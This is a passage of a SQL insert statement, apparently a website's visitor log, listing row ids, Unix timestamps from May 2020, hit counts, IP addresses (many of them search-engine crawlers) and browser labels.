,'66.249.70.70',''),(507804,1590274824,1,1,0,0,'17.58.99.7','other'),(507805,1590274896,8,8,0,0,'77.120.98.235','other'),(507806,1590275035,1,1,0,0,'66.249.64.38','chrome'),(507807,1590275217,1,1,0,0,'66.249.64.33','chrome'),(507808,1590275246,2,2,0,0,'66.249.70.69','chrome'),(507809,1590275258,2,2,0,0,'66.249.64.36','chrome'),(507810,1590275894,1,1,0,0,'207.46.13.8','other'),(507811,1590275982,1,1,0,0,'66.249.70.70','chrome'),(507812,1590276900,1,1,0,0,'3.22.172.250','chrome'),(507813,1590277114,8,8,0,0,'77.120.98.235','other'),(507814,1590277993,1,1,0,0,'8.29.198.27','other'),(507815,1590277995,2,2,0,0,'66.249.70.69','chrome'),(507816,1590278000,2,2,0,0,'66.249.70.70','chrome'),(507817,1590278107,1,1,0,0,'62.205.134.182','other'),(507818,1590278275,1,1,0,0,'8.29.198.26','other'),(507819,1590278625,1,1,0,0,'66.249.70.72','chrome'),(507820,1590278787,1,1,0,0,'66.249.64.33','chrome'),(507821,1590278879,1,1,0,0,'207.46.13.8','other'),(507822,1590279253,1,1,0,0,'66.249.70.70','chrome'),(507823,1590279336,8,8,0,0,'77.120.98.235','other'),(507824,1590279624,1,1,0,0,'207.46.13.107','other'),(507825,1590280031,1,1,0,0,'66.249.70.69','chrome'),(507826,1590280121,1,1,0,0,'207.46.13.8','other'),(507827,1590280204,2,2,0,0,'66.249.70.70','chrome'),(507828,1590280266,1,1,0,0,'66.249.64.33','chrome'),(507829,1590280804,1,1,0,0,'207.46.13.194','other'),(507830,1590281069,1,1,0,0,'3.249.97.207','chrome'),(507831,1590281379,3,3,0,0,'66.249.70.70','chrome'),(507832,1590281415,1,1,0,0,'66.249.70.72','chrome'),(507833,1590281518,8,8,0,0,'77.120.98.235','other'),(507834,1590282234,2,2,0,0,'66.249.70.69','chrome'),(507835,1590282391,1,1,0,0,'66.249.70.72','chrome'),(507836,1590282979,1,1,0,0,'207.46.13.194','other'),(507837,1590283386,1,1,0,0,'66.249.70.72','chrome'),(507838,1590283708,8,8,0,0,'77.120.98.235','other'),(507839,1590284061,8,8,0,0,'66.249.70.69','chrome'),(507840,1590284520,2,2,0,0,'66.249.70.70','chrome'),(507841,1590284657,3,3,0,0,'66.249.64.33','chrome'),(507842,1590284961,1,1,0,0,'66.249.70.72','chrome'),(507843,1590284978,1,1,0,0,'207.46.13.8','other'),(507844,1590285148,1,1,0,0,'13.59.12.187','other'),(507845,1590285154,332,332,0,0,'54.205.191.6','other'),(507846,1590285160,1,1,0,0,'66.249.64.36','chrome'),(507847,1590285245,1,1,0,0,'178.154.200.92','other'),(507848,1590285255,1,1,0,0,'207.46.13.194','other'),(507849,1590285842,8,8,0,0,'77.120.98.235','other'),(507850,1590286056,168,168,0,0,'54.205.191.6','other'),(507851,1590286103,2,2,0,0,'66.249.70.72','chrome'),(507852,1590287175,1,1,0,0,'213.180.203.140','other'),(507853,1590287355,2,2,0,0,'66.249.70.72','chrome'),(507854,1590287402,4,4,0,0,'18.204.220.237','other'),(507855,1590287975,8,8,0,0,'77.120.98.235','other'),(507856,1590288823,1,1,0,0,'8.29.198.25','other'),(507857,1590289100,1,1,0,0,'8.29.198.26','other'),(507858,1590289116,1,1,0,0,'178.154.200.119','other'),(507859,1590289335,1,1,0,0,'66.249.64.38','chrome'),(507860,1590289616,1,1,0,0,'66.249.70.70','chrome'),(507861,1590290003,1,1,0,0,'66.249.70.69','chrome'),(507862,1590290123,8,8,0,0,'77.120.98.235','other'),(507863,1590290402,1,1,0,0,'207.46.13.194','other'),(507864,1590290689,1,1,0,0,'66.249.70.72','chrome'),(507865,1590290869,2,2,0,0,'66.249.70.70','chrome'),(507866,1590291809,3,3,0,0,'35.222.45.178','chrome'),(507867,1590291820,2,2,0,0,'104.197.55.124','chrome'),(507869,1590291830,2,2,0,0,'35.202.216.31','chrome'),(507871,1590291839,4,4,0,0,'35.224.255.250','chrome'),(507873,1590291855,2,2,0,0,'34.68.12.41','chrome'),(507875,1590292108,1,1,0,0,'213.180.203.122','other'),(507876,1590292233,1,1,0,0,'207.46.13.86','other'),(507877,1590292283,8,8,0,0,'77.120.98.235','other'),(507878,1590293660,1,1,0,0,'66.249.73.70','chrome'),(507879,1590294355,1,1,0,0,'93.74.129.84','chrome'),(507880,1590294450,8,8,0,0,'77.120.98.235','other'),(507881,1590295162,1,1,0,0,'207.46.13.105','other'),(507882,1590295204,1,1,0,0,'66.249.70.72','chrome'),(507883,1590295238,1,1,0,0,'66.249.70.69','chrome'),(507884,1590295485,1,1,0,0,'66.249.64.33','chrome'),(507885,1590295696,1,1,0,0,'62.205.134.182','other'),(507886,1590296261,2,2,0,0,'66.249.70.70','chrome'),(507887,1590296356,1,1,0,0,'66.249.70.69','chrome'),(507888,1590296634,8,8,0,0,'77.120.98.235','other'),(507889,1590297246,1,1,0,0,'207.46.13.105','other'),(507890,1590298375,2,2,0,0,'66.249.70.69','chrome'),(507891,1590298414,2,2,0,0,'66.249.70.70','chrome'),(507892,1590298807,8,8,0,0,'77.120.98.235','other'),(507893,1590299654,2,2,0,0,'8.29.198.25','other'),(507894,1590300146,1,1,0,0,'66.249.70.69','chrome'),(507895,1590300314,1,1,0,0,'66.249.70.70','chrome'),(507896,1590300685,1,1,0,0,'207.46.13.105','other'),(507897,1590301015,8,8,0,0,'77.120.98.235','other'),(507898,1590301642,1,1,0,0,'207.46.13.231','other'),(507899,1590302846,1,1,0,0,'207.46.13.105','other'),(507900,1590303187,2,2,0,0,'66.249.70.69','chrome'),(507901,1590303290,8,8,0,0,'77.120.98.235','other'),(507902,1590303879,1,1,0,0,'66.249.70.70','chrome'),(507903,1590304191,1,1,0,0,'131.220.6.152','chrome'),(507904,1590304194,2,2,0,0,'66.249.70.69','chrome'),(507905,1590305572,8,8,0,0,'77.120.98.235','other'),(507906,1590305672,1,1,0,0,'66.249.64.38','chrome'),(507907,1590305835,1,1,0,0,'66.249.70.72','chrome'),(507908,1590306870,2,2,0,0,'66.249.70.69','chrome'),(507909,1590306895,2,2,0,0,'207.46.13.231','other'),(507910,1590307590,1,1,0,0,'91.196.177.194','other'),(507911,1590307640,2,2,0,0,'66.249.64.38','chrome'),(507912,1590307856,1,1,0,0,'207.46.13.231','other'),(507913,1590307887,8,8,0,0,'77.120.98.235','other'),(507914,1590307944,1,1,0,0,'66.249.70.72','chrome'),(507915,1590308272,1,1,0,0,'17.58.99.7','other'),(507916,1590308671,1,1,0,0,'178.133.188.53','chrome'),(507917,1590309133,1,1,0,0,'157.55.39.123','other'),(507918,1590309175,1,1,0,0,'66.249.70.69','chrome'),(507919,1590309546,2,2,0,0,'66.249.64.33','chrome'),(507920,1590309568,2,2,0,0,'66.249.70.70','chrome'),(507921,1590310143,1,1,0,0,'207.46.13.149','other'),(507922,1590310184,8,8,0,0,'77.120.98.235','other'),(507923,1590310271,2,2,0,0,'66.249.70.72','chrome'),(507924,1590310488,2,2,0,0,'8.29.198.26','other'),(507925,1590310575,1,1,0,0,'66.249.64.33','chrome'),(507926,1590310772,2,2,0,0,'66.249.70.69','chrome'),(507927,1590311435,3,3,0,0,'157.55.39.123','other'),(507928,1590311465,1,1,0,0,'207.46.13.149','other'),(507929,1590312172,20,20,0,0,'69.30.202.138','other'),(507930,1590312385,18,18,0,0,'192.99.7.182','other'),(507931,1590312460,8,8,0,0,'77.120.98.235','other'),(507932,1590312554,1,1,0,0,'66.249.70.72','chrome'),(507933,1590312559,1,1,0,0,'66.249.70.69','chrome'),(507934,1590312925,1,1,0,0,'194.61.24.94','other'),(507935,1590313296,2,2,0,0,'192.99.7.182','other'),(507936,1590313397,1,1,0,0,'66.249.70.70','chrome'),(507937,1590313987,1,1,0,0,'66.249.64.38','chrome'),(507938,1590314190,1,1,0,0,'157.55.39.123','other'),(507939,1590314471,3,3,0,0,'66.249.70.70','chrome'),(507940,1590314756,8,8,0,0,'77.120.98.235','other'),(507941,1590315212,1,1,0,0,'66.249.70.69','chrome'),(507942,1590315668,1,1,0,0,'207.46.13.213','other'),(507943,1590316253,2,2,0,0,'66.249.70.72','chrome'),(507944,1590316742,1,1,0,0,'66.249.70.70','chrome'),(507945,1590316903,1,1,0,0,'91.209.11.236','other'),(507946,1590317040,8,8,0,0,'77.120.98.235','other'),(507947,1590317431,2,2,0,0,'66.249.70.72','chrome'),(507948,1590318315,1,1,0,0,'157.55.39.123','other'),(507949,1590318435,1,1,0,0,'109.74.154.72','chrome'),(507950,1590318468,1,1,0,0,'66.249.70.70','chrome'),(507951,1590318547,1,1,0,0,'66.249.64.38','chrome'),(507952,1590319295,2,2,0,0,'66.249.70.72','chrome'),(507953,1590319352,8,8,0,0,'77.120.98.235','other'),(507954,1590319370,17,17,0,0,'192.99.7.182','other'),(507955,1590319452,1,1,0,0,'66.249.64.48','chrome'),(507956,1590319710,2,2,0,0,'66.249.64.36','chrome'),(507957,1590319862,1,1,0,0,'17.58.99.7','other'),(507958,1590319868,1,1,0,0,'66.249.64.33','chrome'),(507959,1590320296,1,1,0,0,'192.99.7.182','other'),(507960,1590320300,1,1,0,0,'66.249.70.72','chrome'),(507961,1590320329,1,1,0,0,'207.46.13.149','other'),(507962,1590320488,1,1,0,0,'207.46.13.213','other'),(507963,1590320611,2,2,0,0,'66.249.70.70','chrome'),(507964,1590321307,1,1,0,0,'17.58.99.7','other'),(507965,1590321321,1,1,0,0,'8.29.198.27','other'),(507966,1590321466,1,1,0,0,'207.46.13.12','other'),(507967,1590321472,4,4,0,0,'157.55.39.123','other'),(507968,1590321510,2,2,0,0,'66.249.70.69','chrome'),(507969,1590321587,1,1,0,0,'8.29.198.26','other'),(507970,1590321643,2,2,0,0,'66.249.70.72','chrome'),(507971,1590321655,8,8,0,0,'77.120.98.235','other'),(507972,1590322437,1,1,0,0,'66.249.70.70','chrome'),(507973,1590322703,1,1,0,0,'207.46.13.12','other'),(507974,1590322730,2,2,0,0,'66.249.70.69','chrome'),(507975,1590322887,1,1,0,0,'66.249.70.72','chrome'),(507976,1590323328,1,1,0,0,'207.46.13.149','other'),(507977,1590323809,1,1,0,0,'66.249.70.70','chrome'),(507978,1590324043,8,8,0,0,'77.120.98.235','other'),(507979,1590324319,2,2,0,0,'207.46.13.149','other'),(507980,1590324547,2,2,0,0,'207.46.13.12','other'),(507981,1590324574,2,2,0,0,'66.249.64.33','chrome'),(507982,1590324835,1,1,0,0,'207.46.13.213','other'),(507983,1590325300,5,5,0,0,'66.249.70.69','chrome'),(507984,1590325574,1,1,0,0,'66.249.70.72','chrome'),(507985,1590325995,1,1,0,0,'207.46.13.213','other'),(507986,1590326264,1,1,0,0,'207.46.13.12','other'),(507987,1590326372,8,8,0,0,'77.120.98.235','other'),(507988,1590326772,2,2,0,0,'66.249.70.72','chrome'),(507989,1590326789,1,1,0,0,'66.249.70.70','chrome'),(507990,1590327250,1,1,0,0,'66.249.64.33','chrome'),(507991,1590327605,1,1,0,0,'91.218.45.35','chrome'),(507992,1590327686,2,2,0,0,'207.46.13.12','other'),(507993,1590327726,2,2,0,0,'207.46.13.213','other'),(507994,1590328305,2,2,0,0,'66.249.70.72','chrome'),(507995,1590328410,2,2,0,0,'207.46.13.149','other'),(507996,1590328424,3,3,0,0,'66.249.70.69','chrome'),(507997,1590328722,8,8,0,0,'77.120.98.235','other'),(507998,1590328997,1,1,0,0,'89.72.62.122','chrome'),(507999,1590329023,1,1,0,0,'178.154.200.106','other'),(508000,1590329324,2,2,0,0,'66.249.70.72','chrome'),(508001,1590329335,1,1,0,0,'66.249.70.70','chrome'),(508002,1590330432,1,1,0,0,'66.249.70.72','chrome'),(508003,1590330516,1,1,0,0,'66.249.70.69','chrome'),(508004,1590330606,1,1,0,0,'66.249.70.70','chrome'),(508005,1590330675,1,1,0,0,'207.46.13.149','other'),(508006,1590331046,8,8,0,0,'77.120.98.235','other'),(508007,1590331452,2,2,0,0,'157.55.39.237','other'),(508008,1590331467,1,1,0,0,'66.249.70.69','chrome'),(508009,1590331916,1,0,1,0,'66.249.70.70',''),(508010,1590331940,1,1,0,0,'207.46.13.149','other'),(508011,1590332148,1,1,0,0,'8.29.198.26','other'),(508012,1590332403,1,1,0,0,'31.13.127.11','other'),(508013,1590332405,1,1,0,0,'31.13.127.3','other'),(508016,1590332410,1,1,0,0,'8.29.198.27','other'),(508017,1590332675,1,1,0,0,'66.249.64.33','chrome'),(508018,1590332717,1,1,0,0,'157.55.39.237','other'),(508019,1590333135,1,1,0,0,'66.249.70.72','chrome'),(508020,1590333198,1,1,0,0,'91.209.11.236','other'),(508021,1590333340,1,1,0,0,'207.46.13.149','other'),(508022,1590333400,8,8,0,0,'77.120.98.235','other'),(508023,1590334193,1,1,0,0,'66.249.70.69','chrome'),(508024,1590334437,1,1,0,0,'17.58.99.7','other'),(508025,1590334497,1,1,0,0,'66.249.64.38','chrome'),(508026,1590334671,1,1,0,0,'66.249.70.72','chrome'),(508027,1590334677,1,1,0,0,'207.46.13.12','other'),(508028,1590334904,1,1,0,0,'157.55.39.237','other'),(508029,1590335726,8,8,0,0,'77.120.98.235','other'),(508030,1590336065,3,3,0,0,'66.249.70.70','chrome'),(508031,1590336331,1,1,0,0,'207.46.13.12','other'),(508032,1590336369,1,1,0,0,'66.249.64.38','chrome'),(508033,1590336806,1,1,0,0,'207.46.13.213','other'),(508034,1590337010,1,1,0,0,'91.196.178.39','chrome'),(508035,1590337536,1,1,0,0,'157.55.39.237','other'),(508036,1590337885,1,1,0,0,'209.17.96.18','other'),(508037,1590337988,1,1,0,0,'66.249.70.69','chrome'),(508038,1590337989,1,1,0,0,'207.46.13.12','other'),(508039,1590338077,8,8,0,0,'77.120.98.235','other'),(508040,1590338190,2,2,0,0,'66.249.70.70','chrome'),(508041,1590339258,1,1,0,0,'207.46.13.94','other'),(508042,1590339826,1,1,0,0,'66.249.70.70','chrome'),(508043,1590340062,2,2,0,0,'66.249.70.69','chrome'),(508044,1590340442,8,8,0,0,'77.120.98.235','other'),(508045,1590340456,1,1,0,0,'157.55.39.237','other'),(508046,1590340474,1,1,0,0,'157.55.39.192','other'),(508047,1590341204,1,1,0,0,'66.249.70.69','chrome'),(508048,1590341462,1,1,0,0,'66.249.64.36','chrome'),(508049,1590341772,3,3,0,0,'66.249.70.70','chrome'),(508050,1590342530,1,1,0,0,'178.133.167.31','chrome'),(508051,1590342585,1,1,0,0,'157.55.39.237','other'),(508052,1590342839,8,8,0,0,'77.120.98.235','other'),(508053,1590342908,1,1,0,0,'66.249.70.70','chrome'),(508054,1590342973,1,1,0,0,'8.29.198.27','other'),(508055,1590343243,1,1,0,0,'8.29.198.26','other'),(508056,1590343613,1,1,0,0,'66.249.64.36','chrome'),(508057,1590343641,1,1,0,0,'207.46.13.12','other'),(508058,1590343779,1,1,0,0,'178.154.200.222','other'),(508059,1590344187,1,1,0,0,'157.55.39.237','other'),(508060,1590344253,4,4,0,0,'66.249.70.69','chrome'),(508061,1590344490,1,1,0,0,'213.180.203.16','other'),(508062,1590344605,1,1,0,0,'66.249.64.33','chrome'),(508063,1590344670,1,1,0,0,'207.46.13.12','other'),(508064,1590344836,1,1,0,0,'66.249.64.36','chrome'),(508065,1590345011,1,1,0,0,'213.180.203.58','other'),(508066,1590345079,1,1,0,0,'178.154.200.222','other'),(508067,1590345293,8,8,0,0,'77.120.98.235','other'),(508068,1590345338,1,1,0,0,'157.55.39.237','other'),(508069,1590345572,2,2,0,0,'66.249.70.72','chrome'),(508070,1590345774,1,1,0,0,'66.249.70.69','chrome'),(508071,1590345969,2,2,0,0,'157.55.39.192','other'),(508072,1590346112,1,1,0,0,'66.249.64.36','chrome'),(508073,1590346719,2,2,0,0,'66.249.70.69','chrome'),(508074,1590346725,1,1,0,0,'66.249.70.70','chrome'),(508075,1590346961,1,1,0,0,'66.249.70.72','chrome'),(508076,1590347138,1,1,0,0,'207.46.13.12','other'),(508077,1590347202,1,1,0,0,'207.46.13.94','other'),(508078,1590347210,1,1,0,0,'178.154.200.222','other'),(508079,1590347474,1,1,0,0,'178.154.200.196','other'),(508080,1590347607,1,1,0,0,'213.180.203.16','other'),(508081,1590347692,1,1,0,0,'66.249.64.38','chrome'),(508082,1590347753,8,8,0,0,'77.120.98.235','other'),(508083,1590348168,2,2,0,0,'66.249.70.69','chrome'),(508084,1590348466,2,2,0,0,'66.249.64.36','chrome'),(508085,1590348504,1,1,0,0,'178.154.200.222','other'),(508086,1590348951,1,1,0,0,'178.154.200.86','other'),(508087,1590349219,1,1,0,0,'66.249.70.72','chrome'),(508088,1590349342,2,2,0,0,'66.249.64.33','chrome'),(508089,1590349506,2,2,0,0,'66.249.70.70','chrome'),(508090,1590349538,2,2,0,0,'157.55.39.179','other'),(508091,1590349754,1,1,0,0,'178.154.200.196','other'),(508092,1590350226,8,8,0,0,'77.120.98.235','other'),(508093,1590350331,2,2,0,0,'66.249.64.38','chrome'),(508094,1590350448,1,1,0,0,'213.180.203.16','other'),(508095,1590350556,1,1,0,0,'178.154.200.222','other'),(508097,1590350814,1,1,0,0,'17.58.99.7','other'),(508098,1590350866,2,2,0,0,'157.55.39.179','other'),(508099,1590351039,1,1,0,0,'66.249.64.36','chrome'),(508100,1590351374,1,1,0,0,'213.180.203.16','other'),(508101,1590351866,1,1,0,0,'178.154.200.220','other'),(508102,1590351901,1,1,0,0,'178.154.200.222','other'),(508103,1590352305,1,1,0,0,'213.180.203.101','other'),(508104,1590352307,1,1,0,0,'213.180.203.14','other'),(508105,1590352310,1,1,0,0,'66.249.64.38','chrome'),(508106,1590352552,1,1,0,0,'66.249.70.69','chrome'),(508107,1590352620,8,8,0,0,'77.120.98.235','other'),(508108,1590352656,1,1,0,0,'178.154.200.245','other'),(508109,1590352799,1,1,0,0,'66.249.70.70','chrome'),(508110,1590352820,6,6,0,0,'158.69.243.115','other'),(508111,1590352996,1,1,0,0,'178.154.200.19','other'),(508112,1590353035,1,1,0,0,'66.249.70.72','chrome'),(508113,1590353797,2,2,0,0,'8.29.198.25','other'),(508114,1590353947,1,1,0,0,'213.180.203.29','other'),(508115,1590353990,1,1,0,0,'66.249.64.38','chrome'),(508116,1590354142,2,2,0,0,'157.55.39.192','other'),(508117,1590354217,1,1,0,0,'157.55.39.179','other'),(508118,1590354339,3,3,0,0,'66.249.70.70','chrome'),(508119,1590355022,8,8,0,0,'77.120.98.235','other'),(508120,1590355119,1,1,0,0,'66.249.64.36','chrome'),(508121,1590355176,1,1,0,0,'66.249.70.72','chrome'),(508122,1590355190,1,1,0,0,'213.180.203.17','other'),(508123,1590355676,1,1,0,0,'213.180.203.148','other'),(508124,1590356045,1,1,0,0,'66.249.64.36','chrome'),(508125,1590356220,1,1,0,0,'157.55.39.179','other'),(508126,1590356298,2,1,1,0,'66.249.70.72',''),(508127,1590356348,1,1,0,0,'46.211.137.59','other'),(508128,1590356476,1,1,0,0,'66.249.70.69','chrome'),(508129,1590357056,1,1,0,0,'178.154.200.222','other'),(508130,1590357402,8,8,0,0,'77.120.98.235','other'),(508131,1590357474,1,1,0,0,'157.55.39.179','other'),(508132,1590357541,1,1,0,0,'66.249.70.70','chrome'),(508133,1590358117,1,1,0,0,'157.55.39.192','other'),(508134,1590358468,2,2,0,0,'66.249.70.69','chrome'),(508135,1590358553,1,1,0,0,'66.249.70.70','chrome'),(508136,1590358580,1,1,0,0,'66.249.64.33','chrome'),(508137,1590358777,3,3,0,0,'66.249.70.72','chrome'),(508138,1590358952,1,1,0,0,'66.249.64.36','chrome'),(508139,1590359103,1,1,0,0,'157.55.39.192','other'),(508140,1590359632,1,1,0,0,'66.249.70.70','chrome'),(508141,1590359778,1,1,0,0,'66.249.70.72','chrome'),(508142,1590359817,8,8,0,0,'77.120.98.235','other'),(508143,1590359955,1,1,0,0,'178.154.200.216','other'),(508144,1590360553,1,1,0,0,'157.55.39.179','other'),(508145,1590360686,1,1,0,0,'178.154.200.13','other'),(508146,1590360843,2,2,0,0,'66.249.64.33','chrome'),(508147,1590361111,2,2,0,0,'66.249.70.70','chrome'),(508148,1590362099,8,8,0,0,'77.120.98.235','other'),(508149,1590362269,1,1,0,0,'66.249.64.33','chrome'),(508150,1590362602,1,1,0,0,'66.249.70.72','chrome'),(508151,1590362708,2,2,0,0,'66.249.70.69','chrome'),(508152,1590364343,1,1,0,0,'66.249.70.69','chrome'),(508153,1590364431,8,8,0,0,'77.120.98.235','other'),(508154,1590364506,1,1,0,0,'62.205.134.182','other'),(508155,1590364619,1,1,0,0,'8.29.198.27','other'),(508156,1590364703,3,2,1,0,'66.249.70.70',''),(508157,1590364898,1,1,0,0,'8.29.198.26','other'),(508158,1590365384,1,1,0,0,'66.249.70.69','chrome'),(508159,1590366121,1,1,0,0,'66.249.64.38','chrome'),(508160,1590366283,1,1,0,0,'66.249.70.72','chrome'),(508161,1590366371,2,2,0,0,'157.55.39.179','other'),(508162,1590366419,1,1,0,0,'178.154.200.112','other'),(508163,1590366796,8,8,0,0,'77.120.98.235','other'),(508164,1590367048,4,4,0,0,'66.249.64.33','chrome'),(508165,1590367256,1,1,0,0,'66.249.70.70','chrome'),(508166,1590367437,1,1,0,0,'213.180.203.142','other'),(508167,1590367655,1,0,1,0,'84.17.59.70',''),(508168,1590368350,2,2,0,0,'66.249.70.69','chrome'),(508169,1590368624,1,1,0,0,'66.249.64.36','chrome'),(508170,1590369108,8,8,0,0,'77.120.98.235','other'),(508171,1590369339,1,1,0,0,'66.249.70.69','chrome'),(508172,1590369850,3,3,0,0,'66.249.70.72','chrome'),(508173,1590370470,1,1,0,0,'207.46.13.136','other'),(508174,1590371250,2,2,0,0,'66.249.70.70','chrome'),(508175,1590371261,1,1,0,0,'66.249.70.69','chrome'),(508176,1590371402,8,8,0,0,'77.120.98.235','other'),(508177,1590371463,1,1,0,0,'178.154.200.220','other'),(508178,1590371726,1,1,0,0,'213.180.203.54','other'),(508179,1590371933,1,1,0,0,'178.154.200.97','other'),(508180,1590372425,1,1,0,0,'66.249.70.70','chrome'),(508181,1590372571,1,1,0,0,'66.249.70.69','chrome'),(508182,1590373013,1,1,0,0,'213.180.203.70','other'),(508183,1590373725,8,8,0,0,'77.120.98.235','other'),(508184,1590373785,3,3,0,0,'66.249.70.69','chrome'),(508185,1590373915,3,3,0,0,'66.249.70.72','chrome'),(508186,1590374944,1,1,0,0,'66.249.70.70','chrome'),(508187,1590375009,1,1,0,0,'178.154.200.222','other'),(508188,1590375450,2,2,0,0,'8.29.198.26','other'),(508189,1590375978,1,1,0,0,'66.249.64.33','chrome'),(508190,1590376057,8,8,0,0,'77.120.98.235','other'),(508191,1590376470,1,1,0,0,'213.180.203.16','other'),(508192,1590376521,1,1,0,0,'66.249.70.70','chrome'),(508193,1590376542,1,1,0,0,'213.180.203.52','other'),(508194,1590376606,1,1,0,0,'213.180.203.95','other'),(508195,1590377657,1,1,0,0,'66.249.70.72','chrome'),(508196,1590377679,3,3,0,0,'66.249.70.69','chrome'),(508197,1590377733,1,1,0,0,'213.180.203.142','other'),(508198,1590377801,1,1,0,0,'178.154.200.236','other'),(508199,1590377887,1,1,0,0,'66.249.64.38','chrome'),(508200,1590377955,1,1,0,0,'66.249.64.36','chrome'),(508201,1590378045,1,0,1,0,'66.249.70.70',''),(508202,1590378421,8,8,0,0,'77.120.98.235','other'),(508203,1590378562,1,1,0,0,'66.249.64.33','chrome'),(508204,1590378832,2,2,0,0,'66.249.70.70','chrome'),(508205,1590379299,1,1,0,0,'66.249.70.69','chrome'),(508206,1590379456,1,1,0,0,'66.249.64.36','chrome'),(508207,1590379931,1,1,0,0,'66.249.64.38','chrome'),(508208,1590379992,1,1,0,0,'178.154.200.216','other'),(508209,1590380367,1,1,0,0,'178.154.200.222','other'),(508210,1590380386,2,2,0,0,'213.180.203.16','other'),(508211,1590380725,8,8,0,0,'77.120.98.235','other'),(508212,1590381851,1,1,0,0,'66.249.64.38','chrome'),(508213,1590381872,1,1,0,0,'66.249.64.33','chrome'),(508214,1590382036,1,1,0,0,'62.205.134.182','other'),(508215,1590382223,1,1,0,0,'66.249.70.72','chrome'),(508216,1590382459,2,2,0,0,'54.218.193.183','firefox'),(508217,1590382469,3,3,0,0,'52.37.192.9','firefox'),(508218,1590382475,2,2,0,0,'54.244.206.247','firefox'),(508219,1590382479,1,1,0,0,'54.218.31.51','firefox'),(508220,1590382493,4,4,0,0,'54.188.69.95','firefox'),(508221,1590382508,1,1,0,0,'54.189.187.192','firefox'),(508222,1590382510,1,1,0,0,'54.202.77.28','firefox'),(508223,1590382512,3,3,0,0,'34.216.142.141','firefox'),(508224,1590382537,2,2,0,0,'34.209.126.26','firefox'),(508225,1590382539,2,2,0,0,'34.222.41.21','firefox'),(508226,1590382548,3,3,0,0,'54.184.91.98','firefox'),(508227,1590382552,1,1,0,0,'34.210.205.164','firefox'),(508228,1590382563,1,1,0,0,'54.191.216.129','firefox'),(508229,1590382587,1,1,0,0,'34.220.172.44','firefox'),(508230,1590382588,3,3,0,0,'52.12.72.23','firefox'),(508231,1590382608,1,1,0,0,'34.208.60.114','firefox'),(508232,1590382637,3,3,0,0,'54.218.69.40','firefox'),(508233,1590382643,1,1,0,0,'52.42.75.92','firefox'),(508234,1590382655,2,2,0,0,'34.219.53.84','firefox'),(508235,1590382683,1,1,0,0,'54.70.25.142','firefox'),(508236,1590382688,2,2,0,0,'34.222.137.131','firefox'),(508237,1590382715,1,1,0,0,'54.188.56.247','firefox'),(508238,1590382733,1,1,0,0,'52.89.217.62','firefox'),(508239,1590382756,1,1,0,0,'34.222.126.76','firefox'),(508240,1590382789,2,2,0,0,'54.202.118.127','firefox'),(508241,1590382998,3,3,0,0,'52.36.249.208','firefox'),(508242,1590383017,1,1,0,0,'35.165.249.54','firefox'),(508243,1590383020,2,2,0,0,'34.217.10.238','firefox'),(508244,1590383035,2,2,0,0,'52.12.71.75','firefox'),(508245,1590383046,8,8,0,0,'77.120.98.235','other'),(508246,1590383065,2,2,0,0,'54.187.203.151','firefox'),(508247,1590383153,1,1,0,0,'35.160.127.19','firefox'),(508248,1590383214,2,2,0,0,'54.186.172.20','firefox'),(508249,1590383299,1,1,0,0,'52.33.205.204','firefox'),(508250,1590383316,1,1,0,0,'54.189.144.118','firefox'),(508251,1590383807,1,1,0,0,'178.154.200.236','other'),(508252,1590384147,3,3,0,0,'66.249.70.70','chrome'),(508253,1590384185,2,2,0,0,'66.249.70.69','chrome'),(508254,1590384192,1,1,0,0,'178.154.200.220','other'),(508255,1590384790,1,1,0,0,'91.142.173.225','chrome'),(508256,1590385293,1,1,0,0,'66.249.64.33','chrome'),(508257,1590385367,1,1,0,0,'213.180.203.16','other'),(508258,1590385446,8,8,0,0,'77.120.98.235','other'),(508259,1590385681,1,1,0,0,'66.249.70.70','chrome'),(508260,1590385962,1,1,0,0,'178.154.200.161','other'),(508261,1590386278,1,1,0,0,'8.29.198.26','other'),(508262,1590386345,1,1,0,0,'178.154.200.220','other'),(508263,1590386547,1,1,0,0,'8.29.198.27','other'),(508264,1590386574,1,1,0,0,'66.249.70.72','chrome'),(508265,1590387748,1,1,0,0,'213.180.203.90','other'),(508266,1590387878,1,1,0,0,'66.249.70.70','chrome'),(508267,1590387890,5,5,0,0,'66.249.70.69','chrome'),(508268,1590387925,8,8,0,0,'77.120.98.235','other'),(508269,1590388249,1,1,0,0,'95.132.211.152','chrome'),(508270,1590388285,1,1,0,0,'207.46.13.224','other'),(508271,1590388779,1,1,0,0,'178.154.200.196','other'),(508272,1590388806,1,1,0,0,'51.77.52.160','chrome'),(508273,1590388935,1,1,0,0,'66.249.70.72','chrome'),(508274,1590389512,1,1,0,0,'66.249.70.69','chrome'),(508275,1590390094,1,1,0,0,'107.175.80.173','chrome'),(508276,1590390140,2,2,0,0,'66.249.70.72','chrome'),(508277,1590390189,1,1,0,0,'66.249.70.70','chrome'),(508278,1590390381,1,1,0,0,'131.220.6.152','chrome'),(508279,1590390395,1,1,0,0,'91.196.177.46','chrome'),(508280,1590390416,8,8,0,0,'77.120.98.235','other'),(508281,1590391033,1,1,0,0,'66.249.64.33','chrome'),(508282,1590391162,1,1,0,0,'66.249.64.38','chrome'),(508283,1590391296,1,1,0,0,'207.46.13.224','other'),(508284,1590391302,2,2,0,0,'66.249.70.72','chrome'),(508285,1590391999,1,1,0,0,'66.249.70.69','chrome'),(508286,1590392088,1,1,0,0,'207.46.13.136','other'),(508287,1590392090,2,2,0,0,'66.249.64.38','chrome'),(508288,1590392662,1,1,0,0,'194.61.24.94','other'),(508289,1590393056,8,8,0,0,'77.120.98.235','other'),(508290,1590393208,1,1,0,0,'66.249.70.70','chrome'),(508291,1590393626,2,2,0,0,'207.46.13.224','other'),(508292,1590393631,2,2,0,0,'157.55.39.141','other'),(508293,1590393797,1,1,0,0,'207.46.13.136','other'),(508294,1590394075,1,1,0,0,'91.196.177.46','chrome'),(508295,1590394330,2,2,0,0,'66.249.70.72','chrome'),(508296,1590395043,1,1,0,0,'91.196.177.46','chrome'),(508297,1590395595,1,1,0,0,'178.154.200.196','other'),(508298,1590395679,8,8,0,0,'77.120.98.235','other'),(508299,1590395705,1,1,0,0,'91.196.178.187','chrome'),(508300,1590395855,3,3,0,0,'66.249.70.72','chrome'),(508301,1590395992,1,1,0,0,'66.249.70.70','chrome'),(508302,1590395997,1,1,0,0,'66.249.70.69','chrome'),(508303,1590396589,1,1,0,0,'157.55.39.141','other'),(508304,1590396902,1,1,0,0,'178.154.200.220','other'),(508305,1590396973,2,2,0,0,'66.249.70.70','chrome'),(508306,1590397099,1,1,0,0,'8.29.198.26','other'),(508307,1590397170,1,1,0,0,'178.154.200.222','other'),(508308,1590397372,1,1,0,0,'8.29.198.25','other'),(508309,1590397908,1,1,0,0,'66.249.70.72','chrome'),(508310,